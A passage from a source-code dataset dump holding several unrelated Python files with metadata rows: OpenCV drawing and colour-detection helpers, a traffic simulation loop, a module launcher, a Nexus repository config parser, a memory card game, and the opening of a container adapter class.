:return: Stacked Image
"""
imgList = copy.deepcopy(_imgList)
# make the array full by adding blank img, otherwise the openCV can't work
totalImages = len(imgList)
rows = totalImages // cols if totalImages // cols * \
cols == totalImages else totalImages // cols + 1
blankImages = cols * rows - totalImages
width = imgList[0].shape[1]
height = imgList[0].shape[0]
imgBlank = np.zeros((height, width, 3), np.uint8)
imgList.extend([imgBlank] * blankImages)
# resize the images
for i in range(cols * rows):
imgList[i] = cv2.resize(imgList[i], (0, 0), None, scale, scale)
if len(imgList[i].shape) == 2:
imgList[i] = cv2.cvtColor(imgList[i], cv2.COLOR_GRAY2BGR)
# put the images in a board
hor = [imgBlank] * rows
for y in range(rows):
line = []
for x in range(cols):
line.append(imgList[y * cols + x])
hor[y] = np.hstack(line)
ver = np.vstack(hor)
return ver
def cornerRect(img, bbox, l=30, t=5, rt=1,
colorR=(255, 0, 255), colorC=(0, 255, 0)):
"""
:param img: Image to draw on.
:param bbox: Bounding box [x, y, w, h]
:param l: length of the corner line
:param t: thickness of the corner line
:param rt: thickness of the rectangle
:param colorR: Color of the Rectangle
:param colorC: Color of the Corners
:return:
"""
x, y, w, h = bbox
x1, y1 = x + w, y + h
if rt != 0:
cv2.rectangle(img, bbox, colorR, rt)
# Top Left x,y
cv2.line(img, (x, y), (x + l, y), colorC, t)
cv2.line(img, (x, y), (x, y + l), colorC, t)
# Top Right x1,y
cv2.line(img, (x1, y), (x1 - l, y), colorC, t)
cv2.line(img, (x1, y), (x1, y + l), colorC, t)
# Bottom Left x,y1
cv2.line(img, (x, y1), (x + l, y1), colorC, t)
cv2.line(img, (x, y1), (x, y1 - l), colorC, t)
# Bottom Right x1,y1
cv2.line(img, (x1, y1), (x1 - l, y1), colorC, t)
cv2.line(img, (x1, y1), (x1, y1 - l), colorC, t)
return img
def findContours(img, imgPre, minArea=1000, sort=True, filter=0, drawCon=True, c=(255, 0, 0)):
"""
Finds Contours in an image
:param img: Image on which we want to draw
:param imgPre: Image on which we want to find contours
:param minArea: Minimum Area to detect as valid contour
:param sort: True will sort the contours by area (biggest first)
:param filter: Filters based on the corner points e.g. 4 = Rectangle or square
:param drawCon: draw contours boolean
:return: Foudn contours with [contours, Area, BoundingBox, Center]
"""
conFound = []
imgContours = img.copy()
contours, hierarchy = cv2.findContours(
imgPre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > minArea:
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, 0.02 * peri, True)
# print(len(approx))
if len(approx) == filter or filter == 0:
if drawCon:
cv2.drawContours(imgContours, cnt, -1, c, 3)
x, y, w, h = cv2.boundingRect(approx)
cx, cy = x + (w // 2), y + (h // 2)
cv2.rectangle(imgContours, (x, y), (x + w, y + h), c, 2)
cv2.circle(imgContours, (x + (w // 2),
y + (h // 2)), 5, c, cv2.FILLED)
conFound.append({"cnt": cnt, "area": area, "bbox": [
x, y, w, h], "center": [cx, cy]})
if sort:
conFound = sorted(conFound, key=lambda x: x["area"], reverse=True)
return imgContours, conFound
def overlayPNG(imgBack, imgFront, pos=[0, 0]):
hf, wf, cf = imgFront.shape
hb, wb, cb = imgBack.shape
*_, mask = cv2.split(imgFront)
maskBGRA = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGRA)
maskBGR = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
imgRGBA = cv2.bitwise_and(imgFront, maskBGRA)
imgRGB = cv2.cvtColor(imgRGBA, cv2.COLOR_BGRA2BGR)
imgMaskFull = np.zeros((hb, wb, cb), np.uint8)
imgMaskFull[pos[1]:hf + pos[1], pos[0]:wf + pos[0], :] = imgRGB
imgMaskFull2 = np.ones((hb, wb, cb), np.uint8) * 255
maskBGRInv = cv2.bitwise_not(maskBGR)
imgMaskFull2[pos[1]:hf + pos[1], pos[0]:wf + pos[0], :] = maskBGRInv
imgBack = cv2.bitwise_and(imgBack, imgMaskFull2)
imgBack = cv2.bitwise_or(imgBack, imgMaskFull)
return imgBack
def rotateImage(img, angle, scale=1):
h, w = img.shape[:2]
center = (w / 2, h / 2)
rotate_matrix = cv2.getRotationMatrix2D(
center=center, angle=angle, scale=scale)
img = cv2.warpAffine(src=img, M=rotate_matrix, dsize=(w, h))
return img
class ColorFinder:
"""
Finds color in an image based on hsv values
Can run as stand alone to find relevant hsv values
"""
def __init__(self, trackBar=False):
self.trackBar = trackBar
if self.trackBar:
self.initTrackbars()
def empty(self, a):
pass
def initTrackbars(self):
"""
To intialize Trackbars . Need to run only once
"""
cv2.namedWindow("TrackBars")
cv2.resizeWindow("TrackBars", 640, 240)
cv2.createTrackbar("Hue Min", "TrackBars", 0, 179, self.empty)
cv2.createTrackbar("Hue Max", "TrackBars", 179, 179, self.empty)
cv2.createTrackbar("Sat Min", "TrackBars", 0, 255, self.empty)
cv2.createTrackbar("Sat Max", "TrackBars", 255, 255, self.empty)
cv2.createTrackbar("Val Min", "TrackBars", 0, 255, self.empty)
cv2.createTrackbar("Val Max", "TrackBars", 255, 255, self.empty)
def getTrackbarValues(self):
"""
Gets the trackbar values in runtime
:return: hsv values from the trackbar window
"""
hmin = cv2.getTrackbarPos("Hue Min", "TrackBars")
smin = cv2.getTrackbarPos("Sat Min", "TrackBars")
vmin = cv2.getTrackbarPos("Val Min", "TrackBars")
hmax = cv2.getTrackbarPos("Hue Max", "TrackBars")
smax = cv2.getTrackbarPos("Sat Max", "TrackBars")
vmax = cv2.getTrackbarPos("Val Max", "TrackBars")
hsvVals = {"hmin": hmin, "smin": smin, "vmin": vmin,
"hmax": hmax, "smax": smax, "vmax": vmax}
print(hsvVals)
return hsvVals
def update(self, img, myColor=None):
"""
:param img: Image in which color needs to be found
:param hsvVals: List of lower and upper hsv range
:return: (mask) bw image with white regions where color is detected
(imgColor) colored image only showing regions detected
"""
imgColor = [],
mask = []
if self.trackBar:
myColor = self.getTrackbarValues()
if isinstance(myColor, str):
myColor = self.getColorHSV(myColor)
if myColor is not None:
imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lower = np.array(
[myColor['hmin'], myColor['smin'], myColor['vmin']])
upper = np.array(
[myColor['hmax'], myColor['smax'], myColor['vmax']])
mask = cv2.inRange(imgHSV, lower, upper)
imgColor = cv2.bitwise_and(img, img, mask=mask)
return imgColor, mask
def getColorHSV(self, myColor):
if myColor == 'red':
output = {'hmin': 146, 'smin': 141, 'vmin': 77,
'hmax': 179, 'smax': 255, 'vmax': 255}
elif myColor == 'green':
output = {'hmin': 44, 'smin': 79, 'vmin': 111,
'hmax': 79, 'smax': 255, 'vmax': 255}
elif myColor == 'blue':
output = {'hmin': 103, 'smin': 68, 'vmin': 130,
'hmax': 128, 'smax': 255, 'vmax': 255}
else:
output = None
logging.warning("Color Not Defined")
logging.warning("Available colors: red, green, blue ")
return output
class FPS:
"""
Helps in finding Frames Per Second and display on an OpenCV Image
"""
def __init__(self):
self.pTime = time.time()
def update(self, img=None, pos=(20, 50), color=(255, 0, 0), scale=3, thickness=3):
"""
Update the frame rate
:param img: Image to display on, can be left blank if only fps value required
:param pos: Position on the FPS on the image
:param color: Color of the FPS Value displayed
:param scale: Scale of the FPS Value displayed
:param thickness: Thickness of the FPS Value displayed
:return:
"""
cTime = time.time()
try:
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
if img is None:
return fps
else:
cv2.putText(img, f'FPS: {int(fps)}', pos, cv2.FONT_HERSHEY_PLAIN,
scale, color, thickness)
return fps, img
except:
return 0
class LivePlot:
"""
Live Plotting Graphs
Can be used for PID tuning, Simple Trigonometric Plots, etc.
"""
def __init__(self, w=640, h=480, yLimit=[0, 100],
interval=0.001, invert=False, char=' '):
self.yLimit = yLimit
self.w = w
self.h = h
self.invert = invert
self.interval = interval
self.char = char[0]
self.imgPlot = np.zeros((self.h, self.w, 3), np.uint8)
self.imgPlot[:] = 225, 225, 225
cv2.rectangle(self.imgPlot, (0, 0),
(self.w, self.h),
(0, 0, 0), cv2.FILLED)
self.xP = 0
self.yP = 0
self.yList = []
self.xList = [x for x in range(0, 100)]
self.ptime = 0
def update(self, y):
if time.time() - self.ptime > self.interval:
# Refresh
self.imgPlot[:] = 225, 225, 225
# Draw Static Parts
self.drawBackground()
# Draw the text value
cv2.putText(self.imgPlot, str(y),
(self.w - (125), 50), cv2.FONT_HERSHEY_PLAIN,
3, (150, 150, 150), 3)
if self.invert:
self.yP = int(np.interp(y, self.yLimit,
[self.h, 0]))
else:
self.yP = int(np.interp(y, self.yLimit,
[0, self.h]))
self.yList.append(self.yP)
if len(self.yList) == 100:
self.yList.pop(0)
for i in range(0, len(self.yList)):
if i < 2:
pass
else:
cv2.line(self.imgPlot, (int((self.xList[i - 1] * (self.w // 100))) - (self.w // 10),
self.yList[i - 1]),
(int((self.xList[i] * (self.w // 100)) - (self.w // 10)),
self.yList[i]), (255, 0, 255), 2)
self.ptime = time.time()
return self.imgPlot
def drawBackground(self):
# Draw Background Canvas
cv2.rectangle(self.imgPlot, (0, 0),
(self.w, self.h),
(0, 0, 0), cv2.FILLED)
# Center Line
cv2.line(self.imgPlot, (0, self.h // 2),
(self.w, self.h // 2), (150, 150, 150), 2)
# Draw Grid Lines
for x in range(0, self.w, 50):
cv2.line(self.imgPlot, (x, 0), (x, self.h),
(50, 50, 50), 1)
for y in range(0, self.h, 50):
cv2.line(self.imgPlot, (0, y), (self.w, y),
(50, 50, 50), 1)
# Y Label
cv2.putText(self.imgPlot, f'{int((self.h - y) * (self.yLimit[1] / self.h))}',
(10, y), cv2.FONT_HERSHEY_PLAIN,
1, (150, 150, 150), 1)
cv2.putText(self.imgPlot, self.char,
(self.w - 100, self.h - 25), cv2.FONT_HERSHEY_PLAIN,
5, (150, 150, 150), 5)
def putTextRect(img, text, pos, scale=3, thickness=3, colorT=(255, 255, 255),
colorR=(255, 0, 255), font=cv2.FONT_HERSHEY_PLAIN,
offset=10, border=None, colorB=(0, 255, 0)):
"""
Creates Text with Rectangle Background
:param img: Image to put text rect on
:param text: Text inside the rect
:param pos: Starting position of the rect x1,y1
:param scale: Scale of the text
:param thickness: Thickness of the text
:param colorT: Color of the Text
:param colorR: Color of the Rectangle
:param font: Font used. Must be cv2.FONT....
:param offset: Clearance around the text
:param border: Outline around the rect
:param colorB: Color of the outline
:return: image, rect (x1,y1,x2,y2)
"""
ox, oy = pos
(w, h), _ = cv2.getTextSize(text, font, scale, thickness)
x1, y1, x2, y2 = ox - offset, oy + offset, ox + w + offset, oy - h - offset
cv2.rectangle(img, (x1, y1), (x2, y2), colorR, cv2.FILLED)
if border is not None:
cv2.rectangle(img, (x1, y1), (x2, y2), colorB, border)
cv2.putText(img, text, (ox, oy), font, scale, colorT, thickness)
return img, [x1, y2, x2, y1]
| 35.491139 | 105 | 0.527855 | 1,777 | 14,019 | 4.140687 | 0.211593 | 0.009513 | 0.010873 | 0.017668 | 0.169204 | 0.112395 | 0.0704 | 0.044034 | 0.025007 | 0.018211 | 0 | 0.052809 | 0.343534 | 14,019 | 394 | 106 | 35.581218 | 0.746713 | 0.189029 | 0 | 0.092827 | 0 | 0.004219 | 0.045321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07173 | false | 0.008439 | 0.025316 | 0 | 0.164557 | 0.004219 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eed14fe9df66636359b69e6afcb70db03dc49df | 7,460 | py | Python | main.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | main.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | main.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | import time
import sys
from graphics import GraphApp, GraphWin, Text, Point, _root
from menu import MainMenu
from graphs import Graph, ShortestPaths
from maps import RoadMap
from cars import Car, CarShape, CarFactory
from gps import GPS
from info_window import InfoWindow, RoadInfoWindow
from collision import GridCollisionSystem, QuadTreeCollisionSystem
from latlon import LatLonConverter
from openstreetmap import query_roads_by_lat_lon, save_raw_json_map_data
def main():
window.addToParent()
window.setBackground('white')
window.clear()
window.resetView()
secondary_window.addToParent()
secondary_window.setBackground('white')
secondary_window.clear()
road_info_window.setBackground('white')
road_info_window.clear()
config_data = main_menu.config_data
map_data = config_data["map_data"]
S = map_data["coords_south"]
W = map_data["coords_west"]
N = map_data["coords_north"]
E = map_data["coords_east"]
llc = LatLonConverter(window, S, W, N, E)
graph = Graph()
graph.load_open_street_map_data(map_data["filename"], llc)
road_map = RoadMap(graph, window)
road_map.draw()
road_map.draw_road_names()
gps = GPS(graph, road_map)
cars = []
car_shapes = []
car_factory = CarFactory(window, gps, cars, car_shapes)
num_cars = config_data["num_cars"]
for _ in range(num_cars):
car_factory.create()
# collision_system = GridCollisionSystem(window, cars)
collision_system = QuadTreeCollisionSystem(window, cars)
info = InfoWindow(secondary_window)
info.set_selected_car(cars[0])
info.initialize_table()
car_shapes[info.selected_car.index].shape.setFill("yellow")
road_info = RoadInfoWindow(road_info_window)
for car_shape in car_shapes:
car_shape.draw()
# initialize simulation variables
simTime = 0.0
limit = 10000
TICKS_PER_SECOND = 30
TIME_PER_TICK = 1.0/TICKS_PER_SECOND
nextLogicTick = TIME_PER_TICK
lastFrameTime = time.time()
lag = 0.0
# Main Simulation Loop
while simTime < limit:
currentTime = time.time()
elapsed = currentTime - lastFrameTime
lastFrameTime = currentTime
lag += elapsed
simTime += elapsed
# process events
window.update()
secondary_window.update()
road_info_window.update()
frame.update()
last_pressed_key = (
window.checkKey() or
secondary_window.checkKey() or
road_info_window.checkKey()
)
if last_pressed_key is not None:
if last_pressed_key == "space":
pause()
lastFrameTime = time.time()
elif last_pressed_key == "p":
window.zoomIn()
elif last_pressed_key == "o":
window.zoomOut()
elif last_pressed_key == "d":
print(road_map.get_roads_within_view())
last_clicked_pt = window.checkMouse()
if last_clicked_pt is not None:
car_clicked = False
map_obj_clicked = False
for car_shape in car_shapes:
if car_shape.clicked(last_clicked_pt):
car_shapes[info.selected_car.index].shape.setFill("white")
info.set_selected_car(cars[car_shape.index])
car_shapes[info.selected_car.index].shape.setFill("yellow")
car_clicked = True
break
if not car_clicked:
nearby_object_ids = road_map.get_nearby_object_ids(last_clicked_pt.x, last_clicked_pt.y)
for map_obj_id in nearby_object_ids:
map_obj = road_map.get_obj_by_id(map_obj_id)
if map_obj.clicked(last_clicked_pt):
relx, rely = window.getRelativeScreenPos(last_clicked_pt.x, last_clicked_pt.y)
road_info_window_options = {"place": {"relx": relx, "rely": rely}}
road_info_window.addToParent(road_info_window_options)
road_info.set_selected_item(map_obj)
map_obj_clicked = True
break
if not map_obj_clicked:
road_info_window.forget()
last_clicked_pt = secondary_window.checkMouse()
if last_clicked_pt is not None:
secondary_window.update()
for button in info.buttons:
button.clicked(last_clicked_pt)
continue
# update simulation logic
while lag > TIME_PER_TICK:
collision_system.process_collisions(cars)
for car in cars:
car.move_towards_dest(TIME_PER_TICK)
car_shape = car_shapes[car.index]
car_shape.x = cars[car.index].x
car_shape.y = cars[car.index].y
collision_system.update_objects(cars)
nextLogicTick += TIME_PER_TICK
lag -= TIME_PER_TICK
# render updates to window
for car_shape in car_shapes:
car_shape.render()
info.update_table()
if info.follow_car:
window.centerScreenOnPoint(info.selected_car.x, info.selected_car.y)
road_info.update_table()
road_map.draw_route(info.selected_car, info.show_route)
_root.update_idletasks()
cleanup()
def pause():
"""pause until user hits space again"""
cx, cy = window.getCenterScreenPoint()
message = Text(Point(cx, cy), 'Paused')
message.setSize(24)
message.draw(window)
while (
window.checkKey() != "space" and
secondary_window.checkKey() != "space" and
road_info_window.checkKey() != "space"
):
window.update()
secondary_window.update()
road_info_window.update()
message.undraw()
def cleanup():
"""free resources and close window"""
window.close()
secondary_window.close()
road_info_window.close()
frame.close()
sys.exit()
if __name__ == '__main__':
frame = GraphApp("Traffic Simulation")
window_options = {"pack": {"side": "left", "fill": "both", "expand": True}}
window = GraphWin(
"Map Window", 1280, 800, autoflush=False,
new_window=False, master=frame.master, master_options=window_options
)
secondary_window_options = {"place": {"relx": 1, "rely": 0, "anchor": "ne"}}
secondary_window = GraphWin(
"Info Window", 300, 400, autoflush=False, scrollable=False,
new_window=False, master=frame.master, master_options=secondary_window_options
)
road_info_window = GraphWin(
"Road Info Window", 300, 130, autoflush=False, scrollable=False,
new_window=False, master=frame.master, master_options={}
)
hidden_windows = [secondary_window, road_info_window]
main_menu = MainMenu(window, main, hidden_windows=hidden_windows)
menu_options = {"Menu": main_menu.run, "Restart": main, "Exit": cleanup}
frame.addMenu(menu_options)
main()
# TODO
# AI so cars can change lanes without crashing and adjust route based on existing traffic conditions
# add ability for cars to change lanes
# create gui menu so that settings can be changed in the simulation (# of cars, lane closures, etc)
# increase # of cars that can be drawn on the screen at once to: 500 | 1000
# dynamically load additional map data when zooming out or moving camera
| 33.452915 | 104 | 0.640617 | 897 | 7,460 | 5.054627 | 0.274247 | 0.03176 | 0.046317 | 0.013895 | 0.165858 | 0.14689 | 0.142038 | 0.142038 | 0.120644 | 0.032201 | 0 | 0.008081 | 0.270107 | 7,460 | 222 | 105 | 33.603604 | 0.82461 | 0.082842 | 0 | 0.105263 | 0 | 0 | 0.039454 | 0 | 0 | 0 | 0 | 0.004505 | 0 | 1 | 0.017544 | false | 0 | 0.070175 | 0 | 0.087719 | 0.005848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eed7af0e7e14fb232a58b34bca05351e370155d | 1,050 | py | Python | lambda-encoding/lambda_codec/__main__.py | aroberge/import-experiments | 3ceeab9f2443a259f0a1cbd3cd8e09bff7856178 | [
"MIT"
] | null | null | null | lambda-encoding/lambda_codec/__main__.py | aroberge/import-experiments | 3ceeab9f2443a259f0a1cbd3cd8e09bff7856178 | [
"MIT"
] | null | null | null | lambda-encoding/lambda_codec/__main__.py | aroberge/import-experiments | 3ceeab9f2443a259f0a1cbd3cd8e09bff7856178 | [
"MIT"
] | null | null | null | """
main.py
----------
"""
import argparse
import os
import runpy
import sys
from . import console
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Description",
)
parser.add_argument(
"source",
nargs="?",
help="""Name of the script to be run as though it was the main module
run by Python, so that __name__ does equal '__main__'.
""",
)
def main():
console_dict = {"exit": lambda: os._exit(1)} # force clean exit from console
args = parser.parse_args()
if args.source is not None:
if sys.flags.interactive:
source = args.source
if source.endswith(".py"):
source = source[:-3]
module_dict = runpy.run_module(source, run_name="__main__")
console_dict.update(module_dict)
console.start_console(local_vars=console_dict)
else:
runpy.run_path(args.source, run_name="__main__")
else:
console.start_console(local_vars=console_dict)
main()
| 22.826087 | 81 | 0.639048 | 128 | 1,050 | 4.976563 | 0.476563 | 0.069074 | 0.047096 | 0.053375 | 0.122449 | 0.122449 | 0.122449 | 0 | 0 | 0 | 0 | 0.002528 | 0.246667 | 1,050 | 45 | 82 | 23.333333 | 0.802781 | 0.046667 | 0 | 0.125 | 0 | 0 | 0.167508 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.15625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eef37709e19ecce787c089fc77ca3d1055e5516 | 5,167 | py | Python | nex2art/core/Nexus.py | IntershopCommunicationsAG/nexus2artifactory | 233bad5e9a0992c64892f16202b1e61df12852d9 | [
"Apache-2.0"
] | null | null | null | nex2art/core/Nexus.py | IntershopCommunicationsAG/nexus2artifactory | 233bad5e9a0992c64892f16202b1e61df12852d9 | [
"Apache-2.0"
] | null | null | null | nex2art/core/Nexus.py | IntershopCommunicationsAG/nexus2artifactory | 233bad5e9a0992c64892f16202b1e61df12852d9 | [
"Apache-2.0"
] | null | null | null | import os
import logging
import xml.etree.ElementTree as ET
from . import Security, Ldap
class Nexus:
def __init__(self):
self.log = logging.getLogger(__name__)
self.path = None
self.repos = None
self.repomap = None
self.dirty = True
self.ldap = Ldap()
self.security = Security()
def refresh(self, path):
repos, repomap = [], {}
self.path = None
self.repos = None
self.repomap = None
self.dirty = True
self.ldap.initialize()
self.security.initialize()
if path == None: return True
path = os.path.abspath(path)
caps = self.getYumCapabilities(path)
config = os.path.join(path, 'conf', 'nexus.xml')
self.log.info("Reading Nexus config from %s.", config)
if not os.path.isfile(config):
self.log.error("Nexus config file does not exist.")
return "Given path is not a valid Nexus instance."
try:
xml = ET.parse(config).getroot()
self.security.gettargets(xml)
for repo in xml.find('repositories').findall('repository'):
repodata = {}
repodata['id'] = repo.find('id').text
repodata['desc'] = repo.find('name').text
typ, layout = self.getPackType(caps, repo)
repodata['type'] = typ
repodata['layout'] = layout
self.getRepoClass(repo, repodata)
ext = repo.find('externalConfiguration')
policy = None
if ext != None: policy = ext.find('repositoryPolicy')
repodata['release'] = False
repodata['snapshot'] = False
if policy != None:
repodata['release'] = policy.text in ('RELEASE', 'MIXED')
repodata['snapshot'] = policy.text in ('SNAPSHOT', 'MIXED')
repos.append(repodata)
repomap[repodata['id']] = repodata
self.log.info("Successfully read Nexus config.")
except:
self.log.exception("Error reading Nexus config:")
return "Configuration file nexus.xml is not valid."
repos.sort(key=lambda x: x['class'])
self.ldap.refresh(path)
secrtn = self.security.refresh(path)
if secrtn != True: return secrtn
self.repos = repos
self.repomap = repomap
self.path = path
return True
def getRepoClass(self, repo, repodata):
ext = repo.find('externalConfiguration')
members, master = None, None
if ext != None:
members = ext.find('memberRepositories')
master = ext.find('masterRepositoryId')
remote = repo.find('remoteStorage')
local = repo.find('localStorage')
if local != None:
localurl = local.find('url')
if localurl != None:
lurl = localurl.text
if lurl[-1] != '/': lurl += '/'
repodata['localurl'] = lurl
if members != None:
repodata['class'] = 'virtual'
repodata['repos'] = []
for child in members.findall('memberRepository'):
repodata['repos'].append(child.text)
elif remote != None:
repodata['class'] = 'remote'
repodata['remote'] = remote.find('url').text
elif master != None: repodata['class'] = 'shadow'
else: repodata['class'] = 'local'
def getPackType(self, caps, repo):
if repo.find('id').text in caps: return 'yum', 'simple-default'
rtypes = ['maven1', 'maven2', 'npm', 'nuget', 'gems']
ltypes = ['bower', 'gradle', 'ivy', 'npm', 'nuget', 'sbt', 'vcs']
hint = repo.find('providerHint').text
if hint == None: return 'generic', 'simple-default'
subs = hint[hint.rfind('-'):]
if subs in ('-shadow', '-hosted', '-proxy', '-group'):
hint = hint[:hint.rfind('-')]
if hint == 'm2-m1': hint = 'maven1'
elif hint == 'm1-m2': hint = 'maven2'
elif hint == 'rubygems': hint = 'gems'
if hint not in rtypes: hint = 'generic'
layout = 'simple'
if hint in ltypes: layout = hint
elif hint == 'maven1': hint, layout = 'maven', 'maven-1'
elif hint == 'maven2': hint, layout = 'maven', 'maven-2'
return hint, layout + '-default'
def getYumCapabilities(self, path):
xml = os.path.join(path, 'conf', 'capabilities.xml')
if not os.path.isfile(xml): return []
yumrepos = []
root = ET.parse(xml).getroot()
for cap in root.find('capabilities').findall('capability'):
tid = cap.find('typeId').text
# TODO add 'yum.merge' to this list when Artifactory starts
# supporting virtual Yum repositories
if tid not in ('yum.generate', 'yum.proxy'): continue
props = {}
for prop in cap.find('properties').findall('property'):
props[prop.find('key').text] = prop.find('value').text
yumrepos.append(props['repository'])
return yumrepos
| 41.336 | 79 | 0.543255 | 553 | 5,167 | 5.061483 | 0.285714 | 0.022865 | 0.018221 | 0.011433 | 0.100036 | 0.075027 | 0.043587 | 0.043587 | 0.043587 | 0.043587 | 0 | 0.003699 | 0.319915 | 5,167 | 124 | 80 | 41.669355 | 0.792829 | 0.017999 | 0 | 0.08547 | 0 | 0 | 0.169789 | 0.008282 | 0 | 0 | 0 | 0.008065 | 0 | 1 | 0.042735 | false | 0 | 0.034188 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eefe1977906d53f705ef27c60547b06a9610720 | 2,523 | py | Python | memory_game/memory_game.py | Jimut123/code_skulptor_pygames | 1bb2c65f5bc5519f3caed956a6f5a55a7359fcb3 | [
"MIT"
] | 2 | 2018-11-17T21:12:16.000Z | 2018-12-06T15:04:27.000Z | memory_game/memory_game.py | Jimut123/code_skulptor_pygames | 1bb2c65f5bc5519f3caed956a6f5a55a7359fcb3 | [
"MIT"
] | null | null | null | memory_game/memory_game.py | Jimut123/code_skulptor_pygames | 1bb2c65f5bc5519f3caed956a6f5a55a7359fcb3 | [
"MIT"
] | null | null | null | # implementation of card game - Memory
import simplegui
import random
# for repeatition check
# helper function to initialize globals
def new_game():
cards1 = range(0,8)
cards2 = range(0,8)
random.shuffle(cards1)
random.shuffle(cards2)
global cardDeck
cardDeck = cards1 + cards2
random.shuffle(cardDeck)
global exposed
exposed = [False] * 16
global turns, count
turns = [-1] * 2
count = 0
label.set_text("Turns = " + str(count))
# define event handlers
def mouseclick(pos):
# add game state logic here
global turns, count
# if its 1st Turn just flip (state 0)
if turns[0] == -1 and exposed[pos[0] / 50] == False:
turns[0] = pos[0] / 50
exposed[turns[0]] = True
# if its 2nd Turn (state 1)
elif turns[1] == -1 and exposed[pos[0] / 50] == False:
turns[1] = pos[0] / 50
exposed[turns[1]] = True
#increase overall count of turns after end of both turns
count += 1
label.set_text("Turns = " + str(count))
if False not in exposed:
label.set_text("Won the Game in " + str(count) + " Turns, Press Reset for New Game!" )
# if its 1st Turn (state 2)
elif turns[1] != -1 and exposed[pos[0] / 50] == False:
# if cards doesn't pair flip back both
if cardDeck[turns[0]] != cardDeck[turns[1]]:
exposed[turns[1]] = False
exposed[turns[0]] = False
turns[1] = -1
turns[0] = pos[0] / 50
exposed[turns[0]] = True
else:
turns[1] = -1
turns[0] = pos[0] / 50
exposed[turns[0]] = True
# cards are logically 50x100 pixels in size
def draw(canvas):
for index, card in enumerate(cardDeck):
if exposed[index] == True:
canvas.draw_polygon([(index*50, 0), ((index*50) + 50, 0), ((index*50) + 50, 100), (index*50 , 100)], 1, 'Black', 'White')
canvas.draw_text(str(card), ((index*50) + 10, 70), 65, 'Red')
else:
canvas.draw_polygon([(index*50, 0), ((index*50) + 50, 0), ((index*50) + 50, 100), (index*50 , 100)], 1, 'Black', 'Green')
# create frame and add a button and labels
frame = simplegui.create_frame("Memory", 800, 100)
frame.add_button("Reset", new_game)
label = frame.add_label("Turns = 0")
# register event handlers
frame.set_mouseclick_handler(mouseclick)
frame.set_draw_handler(draw)
# get things rolling
new_game()
frame.start()
| 30.39759 | 133 | 0.575109 | 348 | 2,523 | 4.123563 | 0.298851 | 0.041812 | 0.029268 | 0.036237 | 0.26899 | 0.256446 | 0.221603 | 0.221603 | 0.202787 | 0.182578 | 0 | 0.070831 | 0.289338 | 2,523 | 82 | 134 | 30.768293 | 0.729504 | 0.180341 | 0 | 0.264151 | 0 | 0 | 0.052632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.037736 | 0 | 0.09434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d6feb2821863a29b4221e191fc8923133c2fe913 | 2,585 | py | Python | shepherd/sheep/base_sheep.py | iterait/shepherd | 0847c9885584378dd68a48c40d03f9bb02b2b57c | [
"MIT"
] | 5 | 2018-10-13T19:03:07.000Z | 2019-02-25T06:44:27.000Z | shepherd/sheep/base_sheep.py | iterait/shepherd | 0847c9885584378dd68a48c40d03f9bb02b2b57c | [
"MIT"
] | 62 | 2018-09-13T08:03:39.000Z | 2022-01-03T09:05:54.000Z | shepherd/sheep/base_sheep.py | iterait/shepherd | 0847c9885584378dd68a48c40d03f9bb02b2b57c | [
"MIT"
] | null | null | null | import abc
import logging
from typing import List, Optional
from asyncio import Queue
import zmq.asyncio
from zmq.error import ZMQBaseError
from schematics import Model
from schematics.types import StringType, IntType, ListType
class BaseSheep(metaclass=abc.ABCMeta):
"""
A base class for container adapters - classes that allow launching different kinds of containers.
"""
class Config(Model):
type: str = StringType(required=True)
port: int = IntType(required=True)
devices: List[str] = ListType(StringType, default=lambda: [])
_config: Config
def __init__(self, socket: zmq.asyncio.Socket, sheep_data_root: str):
"""
Create new :py:class:`BaseSheep`.
:param socket: socket for feeding sheep's runner with InputMessages
:param sheep_data_root: sheep data root with job working directories
"""
self._config: Optional[self.Config] = None
